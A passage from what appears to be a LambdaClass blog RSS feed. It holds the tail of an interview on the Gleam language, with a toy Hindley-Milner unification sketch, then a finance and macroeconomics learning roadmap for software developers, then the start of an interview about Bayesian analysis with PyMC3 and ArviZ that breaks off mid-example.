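&lt;p&gt;The core of a Hindley-Milner checker is unification. The toy sketch below (a hypothetical Python illustration, not Gleam’s Rust implementation; it omits the occurs check, generalization, and row types) shows how Algorithm W’s unifier binds type variables as it walks two types:&lt;&#x2F;p&gt;

```python
# Toy term representation: type variables are strings like "a";
# constructors are tuples like ("->", t1, t2) or ("int",).

def resolve(t, subst):
    # Follow substitution chains for type variables.
    while isinstance(t, str) and t in subst:
        t = subst[t]
    return t

def unify(t1, t2, subst=None):
    subst = dict(subst or {})
    t1, t2 = resolve(t1, subst), resolve(t2, subst)
    if t1 == t2:
        return subst
    if isinstance(t1, str):   # bind a type variable (no occurs check here)
        subst[t1] = t2
        return subst
    if isinstance(t2, str):
        subst[t2] = t1
        return subst
    if t1[0] == t2[0] and len(t1) == len(t2):
        # Same constructor: unify the arguments pairwise.
        for a, b in zip(t1[1:], t2[1:]):
            subst = unify(a, b, subst)
        return subst
    raise TypeError(f"cannot unify {t1} with {t2}")

# Unify a -> int with bool -> b: learns a = bool, b = int.
s = unify(("->", "a", ("int",)), ("->", ("bool",), "b"))
print(s)
```

&lt;p&gt;A production typer adds an occurs check (so a variable never unifies with a type containing itself) and, in Gleam’s case, row variables so that records and modules unify polymorphically.&lt;&#x2F;p&gt;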
&lt;p&gt;&lt;strong&gt;Does the static typing provide any run-time guarantees beyond the compilation checks?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;At runtime all types have been erased and there are no run-time checks. This is nice for performance and makes calling Gleam from Erlang easier, but it means there’s no way of automatically handling an incorrect type annotation when calling Erlang from Gleam.&lt;&#x2F;p&gt;
&lt;p&gt;If you have an unruly or unreliable Erlang function that you wish to call from Gleam the standard library provides a module for handling dynamically typed data that can be used to handle the return values safely at runtime.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;How does the type system interact with message passing and distribution? How do you handle the message passing features of erlang? Have you given any thought on protocol specification as type checking?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Currently we don’t have a good solution for typed message passing and such, and development is currently focused on building the more run-of-the-mill parts of the language. Rather than introduce a flawed stop-gap solution that will later need to be replaced I’ve opted not to have first class support for the BEAM’s low level concurrency primitives, so these will have to be used via Erlang FFI.&lt;&#x2F;p&gt;
&lt;p&gt;On the other hand OTP behaviours such as gen_server can be implemented using Gleam’s first class module system, which is enough to start writing OTP applications using Gleam today.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why did you choose Rust for implementing the Gleam compiler? (instead of choosing erlang&#x2F;elixir, etc)&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Gleam started as a few little experiments in Elixir but fairly quickly shifted over to Erlang. In December 2018 I realised I was going to have to refactor the type inference module in a fairly major fashion in order to correct a mistake in the design. The typer was easily the most complex part of the compiler and had accrued a lot of technical debt as I learnt and iterated on the language, so I wasn’t feeling very confident about the refactoring, especially without a static type system to guide me.&lt;&#x2F;p&gt;
&lt;p&gt;I decided that a full rewrite of the compiler would give me a chance to produce a better application without the mistakes of the first version, and using a statically typed language would enable me to refactor more easily in future. I picked Rust, and after roughly 3 months I had a new compiler with roughly the same features, fewer bugs, and less tech debt. It’s also considerably faster.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Is Rust a good language for implementing programming languages?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Yes, I think so. The type system is sophisticated and robust enough to take refactorings that would have bested me in the Erlang version and complete them with relatively little stress and fewer bugs. The tooling, documentation, and libraries are delightful, and the community is exceptionally friendly and helpful.&lt;&#x2F;p&gt;
&lt;p&gt;As a nice little bonus the performance of Rust has improved the user experience somewhat; Compilation is faster and there’s no longer a noticeable lag caused by the Erlang virtual machine booting and loading the various modules.&lt;&#x2F;p&gt;
&lt;p&gt;However it’s certainly not a perfect language for compiler implementation. Rust’s linear type system means it doesn’t need a garbage collector, but it can be a very frustrating experience learning how to write code that type checks, and the resulting code can be quite verbose. I speculate that if I had opted to use OCaml instead the type inference code would be under half the size it currently is.&lt;&#x2F;p&gt;
&lt;p&gt;I’m quite sure that someone with more Rust experience could make a lot of my code more concise and remove unnecessary memory allocations, but what we have today performs well and isn’t too difficult to modify. Overall I’m very happy with the decision to use Rust.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What kind of features do you plan to add to Gleam in the future (if any)? Were you inspired by a specific language?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The two main features I’ve been asked about are typed message passing (as you have enquired about above!) and some form of ad-hoc polymorphism like Haskell’s type classes. I don’t think that type classes are a good fit for Gleam, though perhaps something like OCaml’s proposed implicit module system could be worth exploring. Either way it will be a long time before we can start to design and experiment here, there’s plenty to do beforehand.&lt;&#x2F;p&gt;
&lt;p&gt;I’d like to enhance how atoms are represented at type level. Currently we can say “this value is an atom”, but that’s about it. It would be more useful if we could say “this value is the atom ‘ok’ or the atom ‘error’”, or “this function can take the atom ‘up’ or the atom ‘down’, but no other atom”. This could also be extended to create polymorphic enum variants too, though I’m unsure whether it makes sense to have those as well as Gleam’s existing pre-declared enums.&lt;&#x2F;p&gt;
&lt;p&gt;It could be fun to have some alternative backends for the compiler so that we can compile to Javascript or a native binary, allowing Gleam to be used for cloud functions, command line tools, and other applications to which BEAM is less suited.&lt;&#x2F;p&gt;
&lt;p&gt;A much more mundane feature I’m interested in is record punning, as found in Javascript or Haskell. It would be nice to be able to write this&lt;&#x2F;p&gt;
&lt;p&gt;let {name, score} = player&lt;&#x2F;p&gt;
&lt;p&gt;Instead of&lt;&#x2F;p&gt;
&lt;p&gt;let {name = name, score = score} = player&lt;&#x2F;p&gt;
&lt;p&gt;However that syntax has already been taken by tuples, so something would need to change for us to have this feature.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What recommendations would you give to someone who wants to start writing their first programming language?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Write lots of code in your language before writing the compiler! Solve lots of simple problems and compile it in your mind so that you can work out how all the different features would interplay and how it might work under the hood. Writing a compiler takes a lot of time so the more experimentation and learning you can do to build confidence in your language design the better. Changing syntax when you have one file of fake code takes seconds, while with a compiler it may take many hours. Worse still, changing the semantics of your language in your compiler could take days or weeks. It pays to get the design right first.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>How to earn your Macroeconomics and Finance white belt (as a software developer)</title>
          <pubDate>Thu, 07 Mar 2019 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-earn-your-macroeconomics-and-finance-white-belt-as-a-software-developer/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-earn-your-macroeconomics-and-finance-white-belt-as-a-software-developer/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-earn-your-macroeconomics-and-finance-white-belt-as-a-software-developer/">&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-DqV2jwq55q04VQDnm1lP-A.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I was always interested in economics. However until a few years ago I never really studied finance. Since I decided to change that, I have learnt finance from reading good and bad books, online courses, newspapers, blog posts and online forums and by executing trades. This post sums up and prioritizes the roadmap I recommend taking to learn about finance. Having a deep understanding of macroeconomics is not necessary to learn about finance, even less if you are only looking to manage your own money. However, I highly recommend that you invest some time to understand the basic foundations of how the economy works.&lt;&#x2F;p&gt;
&lt;p&gt;Andrew Lo, an MIT economist, said that while physics has three laws that explain 99% of the phenomena, finance has 99 laws that explain only 3%. Not only do we not fully understand how the economy works but also there is an endless debate on how it should function. Everyone has values and an ideology even if they don’t tell you. You should keep that in mind while studying economics. In this roadmap I try to recommend tools that are easily available and part of current economic thought.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;basic-macroeconomics&quot;&gt;&lt;strong&gt;Basic macroeconomics&lt;&#x2F;strong&gt;&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;strong&gt;How the economic machine works&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
Ray Dalio, founder of the biggest hedge fund in the world, created this 30-minute video called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;youtu.be&#x2F;PHe0bXAIuk0&quot;&gt;How the Economic machine works&lt;&#x2F;a&gt;. In this video he shares his template for understanding how the economy works. What is taught in this video is simple but really important. Don’t just watch it, study it.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;investopedia&quot;&gt;&lt;strong&gt;Investopedia&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;Dalio’s video connects many concepts like transactions, market, central bank, monetary policy, fiscal policy, debt, collateral, credit, interest rate, inflation, deflation, productivity, economic cycles, deleveraging, recession and depression. If you don’t know what any of these words means, or if you have doubts, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.investopedia.com&#x2F;search&quot;&gt;search&lt;&#x2F;a&gt; for them. In most cases Investopedia will have simpler and more beginner-friendly definitions than Wikipedia. In general, at the end of each article you can also find useful examples and related concepts that are worth checking.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;news&quot;&gt;&lt;strong&gt;News&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;Some time ago I saw an interview with an old priest who had dedicated his life to keeping the Latin language alive. The interviewer asked him: “Why are you so good at Latin?”. The priest answered: “Do you see what I am sitting on? My butt. You sit on your butt and study Latin as long as I have. You’ll be a master too”. The general idea is that it takes time to master something, but anybody can do it. My biggest recommendation for learning more about economics and finance is to get a subscription to the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.ft.com&#x2F;&quot;&gt;Financial Times&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.economist.com&#x2F;&quot;&gt;The Economist&lt;&#x2F;a&gt;. Read the Financial Times every day, especially the Markets and Opinion sections. Read the weekly Economist magazine, especially the Finance and Economics section. It’s like working out: after some time you will see big changes, but you won’t be able to see them by doing short-term comparisons. Learning and reading about the financial and economic situation of different countries of the world can be overwhelming at the beginning. Geopolitics is closely related to economics. These three YouTube channels are great for making sense of what you read: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;channel&#x2F;UCwnKziETDbHJtx78nIkfYug&quot;&gt;Caspian Report&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;channel&#x2F;UCT3v6vL2H5HK4loLMc8pmCw&quot;&gt;VisualPolitik&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;channel&#x2F;UCmmPgObSUPw1HL2lq6H4ffA&quot;&gt;Geography Now&lt;&#x2F;a&gt;.
Geography Now is almost exclusively about geography, but it is great to watch when you are reading news about a part of the world you don’t know much about. Caspian Report is the most profound of the three and tries to explain the deep structural reasons for what happens in the world. VisualPolitik doesn’t go as deep in its analysis as Caspian Report and has a noticeable political agenda, but it is useful too.&lt;&#x2F;p&gt;
&lt;p&gt;My recommendation is that you avoid at all costs watching TV channels like CNBC or any newspaper that focuses only on daily news. We live in a world without flavor, dominated by clickbait news and post-truth politics. Deep, slow-to-digest, opinionated analyses are hard to come by. I prefer to read anything that makes me think, even if it is written by somebody whose thinking or values are the opposite of mine.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;macroeconomic-courses-and-books-optional&quot;&gt;&lt;strong&gt;Macroeconomic courses and books (optional)&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;To better learn the concepts mentioned in Ray Dalio’s video you should follow &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.khanacademy.org&#x2F;economics-finance-domain&#x2F;macroeconomics&quot;&gt;Khan Academy’s Macroeconomics course&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;I am not a big fan of textbooks since I find them way too schematic, but if you want to advance in the subject you will need to read one. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.goodreads.com&#x2F;book&#x2F;show&#x2F;1753460.Principles_of_Economics&quot;&gt;Mankiw’s Principles of Economics&lt;&#x2F;a&gt; or &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.goodreads.com&#x2F;book&#x2F;show&#x2F;367710.Macroeconomics&quot;&gt;Krugman’s Macroeconomics&lt;&#x2F;a&gt; are the most basic. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.goodreads.com&#x2F;book&#x2F;show&#x2F;1308531.Macroeconomics&quot;&gt;Blanchard’s Macroeconomics&lt;&#x2F;a&gt; is a little bit more advanced. I am giving several options since you will probably find one of the three books at your library. Keep in mind that studying one of these textbooks is not needed to advance in studying finance. In addition, I don’t agree with their model of the economy, but it is good to know how most economists think.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;finance&quot;&gt;Finance&lt;&#x2F;h3&gt;
&lt;h4 id=&quot;learn-basic-finance-to-invest-your-own-money&quot;&gt;&lt;strong&gt;Learn basic finance to invest your own money&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;The first thing I recommend you do is follow Nobel laureate Robert &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.coursera.org&#x2F;learn&#x2F;financial-markets-global&quot;&gt;Shiller’s Financial Markets course&lt;&#x2F;a&gt;. The course covers stocks, bonds, dividends, markets, brokers, exchanges, bubbles and basic financial market history. He explains things in a simple and concise way. With this course you will get a basic understanding of what finance is.&lt;&#x2F;p&gt;
&lt;p&gt;The next step on your journey should be to get some practical experience. The best way to do this is to open a brokerage account to invest some of your own money. Fees and safety should be the main considerations when choosing which broker to use. Also your nationality and where you live are big factors when choosing a broker. I had good experiences with Interactive Brokers, Saxo Bank and DEGIRO. Robinhood is a new player that you should check out too.&lt;&#x2F;p&gt;
&lt;p&gt;After opening your brokerage account you should decide what you want to invest in. The first book I recommend reading is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.amazon.com&#x2F;gp&#x2F;product&#x2F;1119024927&#x2F;ref=as_li_tl?ie=UTF8&amp;amp;camp=1789&amp;amp;creative=9325&amp;amp;creativeASIN=1119024927&amp;amp;linkCode=as2&amp;amp;tag=aweaofcomsen-20&amp;amp;linkId=33NCCDPJIVOFUTL5&quot;&gt;A Wealth of Common Sense&lt;&#x2F;a&gt;. It is a very good book that explains how to create a simple framework for deciding how to invest for the long term. A drier and more profound book that is pretty similar to the previous one is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.amazon.com&#x2F;Random-Walk-Down-Wall-Street&#x2F;dp&#x2F;1324002182&quot;&gt;A Random Walk Down Wall Street&lt;&#x2F;a&gt;. It is an excellent critique of so-called technical analysis, and it sums up the different investigations that have shown that humans are not rational investors. It is a good book that demonstrates that for retail investors the best thing to do is to put their money in passive, low-fee investment vehicles instead of paying a money manager who charges a lot and doesn’t even deliver market returns. My biggest issue with the book is that it adheres way too strongly to the Efficient Market Hypothesis (EMH). Eugene Fama, another Nobel laureate and one of the most important EMH adherents, said that &lt;em&gt;“In an efficient market, at any point in time, the actual price of a security will be a good estimate of its intrinsic value”&lt;&#x2F;em&gt;. That means that in general there is no free money lying around and that getting above-average returns is really difficult. That is correct, especially for the retail and individual investor.
However, as you will see in the advanced part of this roadmap, I recommend books that are critical of this theory.&lt;&#x2F;p&gt;
&lt;p&gt;Two great books that explain more complex investment strategies are &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.goodreads.com&#x2F;book&#x2F;show&#x2F;25029029&quot;&gt;Global Asset Allocation&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.goodreads.com&#x2F;book&#x2F;show&#x2F;21518331-global-value&quot;&gt;Global Value&lt;&#x2F;a&gt;. Global Asset Allocation shows how diversifying your portfolio beyond bonds and stocks can be useful. Global Value shows how investing in countries that are cheap, as measured by fundamentals like the Price&#x2F;Earnings ratio, gets you great returns in the long run.&lt;&#x2F;p&gt;
&lt;p&gt;With Shiller’s course and these four books plus your broker account you should be perfectly able to invest your money in an intelligent way.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;financial-theory-and-derivatives&quot;&gt;Financial theory and derivatives&lt;&#x2F;h4&gt;
&lt;p&gt;At the beginning, learning about futures, swaps, options or derivatives can be overwhelming. Before stepping into more technical grounds I recommend that you read about the history of hedge funds with their successes and failures to understand what they did and how. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.barnesandnoble.com&#x2F;w&#x2F;more-money-than-god-sebastian-mallaby&#x2F;1100257890&quot;&gt;More Money Than God: Hedge Funds and the Making of A New Elite&lt;&#x2F;a&gt; by Mallaby does just that. A quote from the book:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Although Weymar looked to his teachers for help in refining his mathematical and computing skills, he was unimpressed by their efficient-market theories. “I thought random walk was bullshit,” he said later. “The whole idea that an individual can’t make serious money with a competitive edge over the rest of the market is wacko.”&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;As you can see, this book goes in the opposite direction from A Random Walk Down Wall Street. The success of its main protagonists depends on finding market inefficiencies; they are not believers in the efficient market hypothesis. Thanks to a hedge fund called Quantopian, which provides data, a development platform and education, you can write your own investment algorithms and backtest them to find these kinds of small market inefficiencies. Their free &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.quantopian.com&#x2F;lectures&quot;&gt;lectures&lt;&#x2F;a&gt; are a great resource that you should follow if you know how to code in Python and have some knowledge of probability and statistics. They will introduce you to futures, the Capital Asset Pricing Model, alpha and beta, factors, mean reversion, pairs trading and long-short strategies.&lt;&#x2F;p&gt;
&lt;p&gt;After following these lectures it is time to move on to learning about options. Options are difficult because you are leveraged, they react non-linearly to volatility changes, time plays a huge factor in their pricing, and their payoff function can be convex or concave (if you don’t understand what these words mean, don’t worry). You can be right about your bet and still lose money, and the other way around. They are a counter-intuitive beast. You can create a strategy with options that loses money 99% of the time and still makes enough money in the 1% case to recover everything that was lost and more. There are two books I have used to understand options. The first book I read was &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.goodreads.com&#x2F;book&#x2F;show&#x2F;100827.Options_Futures_and_Other_Derivatives&quot;&gt;Options, Futures and Other Derivatives by John Hull&lt;&#x2F;a&gt;. It is a textbook that explains all the moving parts of a trade that involves derivatives. A good thing about the book is that it has quite a few exercises after each chapter so that you can double-check you really understood what you have read. Since it was difficult for me to grasp everything I read in Hull’s book, I decided to read a second book called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.goodreads.com&#x2F;book&#x2F;show&#x2F;119373.Option_Volatility_Pricing&quot;&gt;Option Volatility &amp;amp; Pricing: Advanced Trading Strategies and Techniques&lt;&#x2F;a&gt;, written by Natenberg. The tone of the book feels like it was written by a practitioner, and it was easier to digest. Hull’s book seemed a little more advanced, and I think it is better to read Natenberg’s book first and Hull’s book afterwards.&lt;&#x2F;p&gt;
&lt;p&gt;After learning the theory you should do some paper trading and real trading with options and futures before moving on. Now it is time to switch from the technical side of things to learning more about the history of financial theory and its critics. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.goodreads.com&#x2F;book&#x2F;show&#x2F;665134.The_Mis_Behavior_of_Markets&quot;&gt;The Misbehavior of Markets: A Fractal View of Financial Turbulence by Mandelbrot&lt;&#x2F;a&gt; is a book that summarizes the history of modern financial theory. After that, it shows that modern financial theory doesn’t take into account big market moves that happen more frequently than the theory predicts. At the end of the book Mandelbrot proposes other ways of modelling financial markets. I found the critique more interesting than the proposal.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.goodreads.com&#x2F;book&#x2F;show&#x2F;13530973-antifragile&quot;&gt;Antifragile by Taleb&lt;&#x2F;a&gt; is a book that summarizes many ideas that Taleb wrote about in Fooled by Randomness and The Black Swan. Similar to what Mandelbrot wrote, Taleb proposes that unpredictable events are far more frequent and influential than most models take into account. Therefore, we should build anything, including our financial strategies, in a manner that benefits from chaos rather than trying to avoid it.&lt;&#x2F;p&gt;
&lt;p&gt;After learning about the tools at your disposal and the dangers involved in trading with options, it is time to learn how to really trade volatility. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.goodreads.com&#x2F;book&#x2F;show&#x2F;24945749-trading-volatility&quot;&gt;Trading Volatility by Bennett&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.goodreads.com&#x2F;book&#x2F;show&#x2F;5404804-volatility-trading&quot;&gt;Volatility Trading by Euan Sinclair&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.goodreads.com&#x2F;book&#x2F;show&#x2F;31867439-the-volatility-smile&quot;&gt;The Volatility Smile by Emanuel Derman&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.goodreads.com&#x2F;book&#x2F;show&#x2F;204689.Dynamic_Hedging&quot;&gt;Dynamic Hedging by Nassim Taleb&lt;&#x2F;a&gt; are the best books in the area. I have only studied the first two; the last two are more complex and I have only given them a superficial and rapid read.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;other-skills&quot;&gt;Other skills&lt;&#x2F;h4&gt;
&lt;p&gt;At some point you will need to learn more about financial accounting. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;playlist?list=PLUkh9m2BorqnKWu0g5ZUps_CbQ-JGtbI9&quot;&gt;Aswath Damodaran has a great course&lt;&#x2F;a&gt; on company valuation that I recommend you follow.&lt;&#x2F;p&gt;
&lt;p&gt;The modern monetary system cannot be separated from the financial markets. This was clearly visible in the last financial crisis. It is important to understand how the banking and monetary system works from a practical point of view. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.coursera.org&#x2F;learn&#x2F;money-banking&quot;&gt;Mehrling’s course&lt;&#x2F;a&gt; is a great introduction to this.&lt;&#x2F;p&gt;
&lt;p&gt;Finally, probability and statistics are the best tools we have to assess and work with risk. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.goodreads.com&#x2F;book&#x2F;show&#x2F;12042357-think-stats&quot;&gt;Think Stats&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;camdavidsonpilon.github.io&#x2F;Probabilistic-Programming-and-Bayesian-Methods-for-Hackers&#x2F;#contents&quot;&gt;Probabilistic Programming &amp;amp; Bayesian Methods for Hackers&lt;&#x2F;a&gt; are the best practical books I can recommend for quickly learning probability and statistics. If you want to start the trip down the rabbit hole, I recommend the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.coursera.org&#x2F;specializations&#x2F;statistics&quot;&gt;Statistics with R Specialization by Duke&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Interview with Osvaldo Martin about Bayesian Analysis with Python</title>
          <pubDate>Mon, 11 Feb 2019 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-osvaldo-martin-about-bayesian-analysis-with-python/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-osvaldo-martin-about-bayesian-analysis-with-python/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-osvaldo-martin-about-bayesian-analysis-with-python/">&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-NpQf9G3ZdnMXLT-QT3sErQ.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Like our &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;notamonadtutorial.com&#x2F;inteview-with-thomas-wiecki-about-probabilistic-programming-and-pymc-66a12b6f3f2e&quot;&gt;previous interviewee&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;aloctavodia&quot;&gt;Osvaldo Martin&lt;&#x2F;a&gt; is one of the developers of PyMC3 and ArviZ. He is a researcher specialized in Bayesian statistics and data science. He will be speaking at our &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;buzzconf&quot;&gt;BuzzConf&lt;&#x2F;a&gt; this year. I hope you like this interview as much as we did!&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h4 id=&quot;can-you-tell-us-how-data-analysis-has-improved-over-the-years&quot;&gt;Can you tell us how data analysis has improved over the years?&lt;&#x2F;h4&gt;
&lt;p&gt;This is not a simple question to answer, especially if we take into account that we have been doing data analysis since ancient times. The analysis of astronomical data has a long tradition; it even predates (modern) science. For most of our history it was motivated by the many different religious liturgies we have invented over the centuries and by the more &lt;em&gt;grounded&lt;&#x2F;em&gt; need to improve and control food production. Fast-forwarding thousands of years, one can argue that the data-driven studies of astronomers like Tycho Brahe had a decisive impact on setting up the scientific revolution. Astronomy and astrology were not fully separated at that time, but Brahe, based on his observations and experience, already thought that astrologists were just charlatans, and he maintained that the planets and stars have no influence over human affairs. If that’s not a Data Scientist, who is?&lt;&#x2F;p&gt;
&lt;p&gt;So the “big thing” we are living through now is not that we suddenly realized data is important; we have known that for centuries. The difference is that now we have tons of available data from scientific disciplines like Biology and Astronomy, just to name two, and from daily interactions with streaming platforms, social networks, cell phones, and sensors all around us. Computers have made this possible by increasing our capacity to store, process and transmit information by several orders of magnitude, and, perhaps equally important, computers have also changed the way we ask questions and provide answers. There is a whole array of new methods to analyze and generate data that are impractical without computers. Indeed, the modern practice and development of Bayesian methods have been profoundly influenced by computers and computational methods, up to the point that modern Bayesian statistics IS computational statistics. The only reason we are talking now about probabilistic programming, Machine Learning and Data Science is that we have cheap and fast computers.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;can-you-tell-us-in-brief-how-pymc3-and-arviz-help-with-bayesian-analysis&quot;&gt;Can you tell us in brief how PyMC3 and ArviZ help with Bayesian Analysis?&lt;&#x2F;h4&gt;
&lt;p&gt;PyMC3 is a probabilistic programming language offering two main components: a very clear syntax to define probabilistic models and a powerful set of methods to solve those models, mainly Markov Chain Monte Carlo and Variational Inference. Ideally the methods to solve probabilistic models should be universal, in the sense that they should be able to solve any valid probabilistic model. Unfortunately, even though current methods are very powerful, they do not always work as we would like; some models are still very difficult or slow to solve. Thus an important step in Bayesian analysis is to check that inference was done properly, and this is one of the motivations for creating ArviZ, a Python package for exploratory analysis of Bayesian models. ArviZ includes functions for posterior analysis, sample diagnostics, model checking, and comparison. ArviZ works hand-in-hand with PyMC3 and other probabilistic programming languages, like PyStan, emcee, Pyro, etc. Where the aim of the probabilistic programming languages is to make it easy to build and solve Bayesian models, the aim of the ArviZ library is to make it easy to process and analyze the results from those models.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;can-you-explain-some-of-the-main-concepts-of-bayesian-analysis&quot;&gt;Can you explain some of the main concepts of Bayesian Analysis?&lt;&#x2F;h4&gt;
&lt;p&gt;Bayesian analysis can be summarized in just two concepts: use probability distributions to represent the uncertainty in your model parameters, then use Bayes’ theorem to update those probabilities given the data you have. All the rest derives from these two main concepts. Other concepts that are important to the practice of Bayesian analysis are shared with other modeling approaches, like evaluating whether models make sense by comparing their output against the data and the available domain knowledge.&lt;&#x2F;p&gt;
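&lt;p&gt;As a minimal editorial sketch of those two concepts (not part of the interview), consider a coin-flip model with a hypothetical &lt;code&gt;update_beta&lt;&#x2F;code&gt; helper: a Beta distribution represents the uncertainty about the coin’s bias, and because the Beta prior is conjugate to the Bernoulli likelihood, the Bayes update reduces to simple parameter arithmetic:&lt;&#x2F;p&gt;

```python
# A minimal sketch of the two concepts above (not from the interview):
# represent uncertainty about a coin's bias with a Beta distribution,
# then use Bayes' theorem to update it with observed flips. With a
# conjugate Beta prior and a Bernoulli likelihood, the posterior is
# again a Beta, so the update is just parameter arithmetic.

def update_beta(alpha, beta, heads, tails):
    # Posterior of Beta(alpha, beta) after observing the given flips.
    return alpha + heads, beta + tails

# Start from a flat prior Beta(1, 1) and observe 7 heads and 3 tails.
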